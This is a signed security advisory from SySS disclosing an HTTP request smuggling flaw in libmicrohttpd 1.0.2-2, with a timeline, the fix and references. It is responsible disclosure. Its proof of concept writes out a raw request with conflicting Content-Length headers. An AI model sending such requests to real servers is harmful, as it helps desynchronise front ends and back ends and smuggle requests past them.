-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2026-018 Product: libmicrohttpd Manufacturer: GNU project Affected Version(s): 1.0.2-2 Tested Version(s): 1.0.2-2 Vulnerability Type: CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Risk Level: High Solution Status: Fixed Manufacturer Notification: 2026-04-07 Solution Date: 2026-04-13 Public Disclosure: 2026-04-16 CVE Reference: Not yet assigned Author of Advisory: Nicola Staller, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The manufacturer describes the product as follows (see [1]): "GNU libmicrohttpd is a small C library that makes it easy to run an HTTP server as part of another application. GNU Libmicrohttpd is free software and part of the GNU project." Due to accepting requests containing multiple different Content-Length headers, libmicrohttpd is vulnerable to HTTP request smuggling. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: libmicrohttpd prioritizes the first occurence of the Content-Length header. This leads to HTTP request smuggling if used in conjunction with a front end prioritizing the last one. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Send an HTTP request with two different Content-Length headers such as the following. Note that line breaks are represented by the textual escape sequence "\r\n": POST / HTTP/1.1\r\n Host: \r\n Connection: keep-alive\r\n Content-Length: 9\r\n Content-Length: Z\r\n \r\n test=test Observe that the request is accepted and the body is processed, indicating that the first Content-Length header was chosen. Accepting such requests violates RFC 9112[4] and RFC 9110[5] and leads to HTTP request smuggling if libmicrohttpd is used with a front end prioritizing the last ocurrence of the Content-Length header. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to libmicrohttpd v1.0.4. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2026-03-19: Vulnerability discovered 2026-04-07: Vulnerability reported to manufacturer 2026-04:13: Patch released by manufacturer 2026-04-16: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for libmicrohttpd https://www.gnu.org/software/libmicrohttpd/ [2] SySS Security Advisory SYSS-2026-018 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-018.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] RFC 9112 https://www.rfc-editor.org/rfc/rfc9112.html [5] RFC 9110 https://www.rfc-editor.org/rfc/rfc9110.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Nicola Staller of SySS GmbH. E-Mail: nicola.staller@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc Key ID: 0x9DF339F941DD2290 Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmneI8oACgkQnfM5+UHd IpDfchAAhGKTSXphDBrHGBpPjSVP3b4FNCgKdrgLdD0QieUPQBycM6P+o85BXXCA xrhWBkeQ+hv1KJLuyQhs/VUbCi2IvuWI0xh9AgcYGhwMHBOozYsp6or96QZ9VTvo 7CQDr3eV82xpbrGIXH7uE0yJAAA9aOqRDTwjqg2NPK5uGPJOGlDPPUFoYds0Guiz gtlnxdLiUOFC7jOdosHL133jnC0//EVXAXeKQwbVtRL0eP1aL5O/3Yk3UMCPW/3x M51iPlU8aRd0+2i2/vs86q6zn3V/DO5JJhr8O1AF+y66IrpCEBo6aYTADASIaAF7 CpxRhFmFUA0XrlAEO+QolbxImc74DRoyqEtCLfPMp5g8DU09u7A4lfQ68N8IV9m1 e2j3kHKO8OYceis/elD1xjNI9M7comly3pjxHIgCtno3U4x/345WNLZx1wfNYIxw QwrTrCLr0nA9N5bniZNr0Y5NexUz3c6hzITYq/Fv7EOOeRAoXq93rqkv2m1c+FyH Sd/pe4Q1qiq0wCQN4hmO2EiSklpSs14oaZyjmRUGHYPKgDnBIDoK5crM24CGCMdn Pt0O10L0uTICKqvR1gJcpzsksMNKMWK/OFJSqyZ9zqTQn4jkmvZddC1zUSq3/RJp eAX6iQQAnEzrP9Idl3czC+DCxb2LcirEUJCLO5f4v7ADhFfz1A4= =BS81 -----END PGP SIGNATURE-----